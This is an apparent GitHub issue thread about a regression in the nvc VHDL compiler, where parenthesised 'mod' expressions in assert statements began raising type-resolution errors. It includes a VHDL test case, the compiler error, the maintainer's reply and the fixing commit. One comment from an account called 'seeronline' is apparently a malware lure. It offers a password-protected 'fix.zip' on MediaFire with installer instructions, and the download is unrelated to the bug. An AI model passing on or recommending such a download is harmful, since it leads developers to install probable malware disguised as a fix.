nickg/nvc #956: parenthesis mess-up asserts

scolabirra, 2024-08-26:
I updated to a more recent version and I'm getting errors on asserts that weren't there before: here an example of asserts rising issues:

```
library ieee;
use ieee.numeric_std.all;

entity test_mod is

  generic (
    size : integer
  );

end entity test_mod;

architecture test of test_mod is

begin
  assert size mod 4 = 0     report "test a"; -- good
  assert (size mod 4) = 0   report "test a"; -- error
  assert (size+1) mod 4 = 0 report "test a"; -- error
  assert (size mod 4 = 0)   report "test a"; -- error
end test;
```

The given error is 
```

** Error: no matching operator "mod" [INTEGER, universal_integer return BOOLEAN | BIT]
    > test.vhd:16
    |
 16 |   assert (size mod 4) = 0 report "a is not 0";
    |           ^^^^^^^^^^
    |
    = Note: no implicit conversion was performed on the second argument as the innermost complete context did not
            determine a unique numeric type
    = Help: IEEE Std 1076-2008 section 9.3.6 "Type conversions"
```

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nickg, 2024-08-26:
Probably a regression caused by the fix to #952, sorry about that.

commit 63fc570b (2024-08-27): Fix handling of PSL assertions with infix operators. Fixes #956
closed 2024-08-27 by nickg